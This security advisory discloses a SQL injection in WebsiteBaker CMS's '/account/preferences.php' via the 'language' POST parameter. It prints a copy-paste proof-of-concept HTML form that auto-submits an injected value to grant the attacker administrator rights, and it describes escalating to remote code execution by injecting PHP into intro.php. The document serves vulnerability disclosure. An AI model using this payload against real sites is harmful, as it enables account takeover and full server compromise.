SQL Injection and RCE in WebsiteBaker

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in WebsiteBaker CMS. A remote attacker will be able to read, write or modify arbitrary information in the database, gain complete control over the vulnerable web application and even the entire web server on which the application is hosted.

The vulnerability exists due to insufficient filtration of user-supplied data passed via "language" HTTP POST parameter to "/account/preferences.php" PHP script. A remote authenticated attacker (the registration is open by default) can alter present SQL query, inject and execute arbitrary SQL commands in the application’s database.

Successful exploitation of vulnerability requires that the attacker is registered and authenticated, but the registration is open by default.

The following exploit code will assign administrative privileges to attacker’s account. To reproduce the vulnerability, just login to the website, copy-paste the code below into an empty HTML file and then open it in your browser:

<form action="http://[host]/account/preferences.php" method="post" name="f1">
<input type="hidden" name="display_name" value="username">
<input type="hidden" name="language" value="EN',group_id='1',groups_id='1">
<input type="hidden" name="action" value="details">
<input value="submit" id="btn" type="submit" />
</form><script>document.f1.submit();</script>

We also attract your attention, that website administrator can edit the "intro.php" file and inject arbitrary PHP code into it using the following URL:

http://[host]/admin/pages/intro.php

The injected code will be executed every time the user visits the following page:

http://[host]/pages/intro.php

Giving these circumstances, successful exploitation of SQL injection vulnerability will lead to Remote Code Execution and full compromise not just of the website, but of the entire web server and related environment.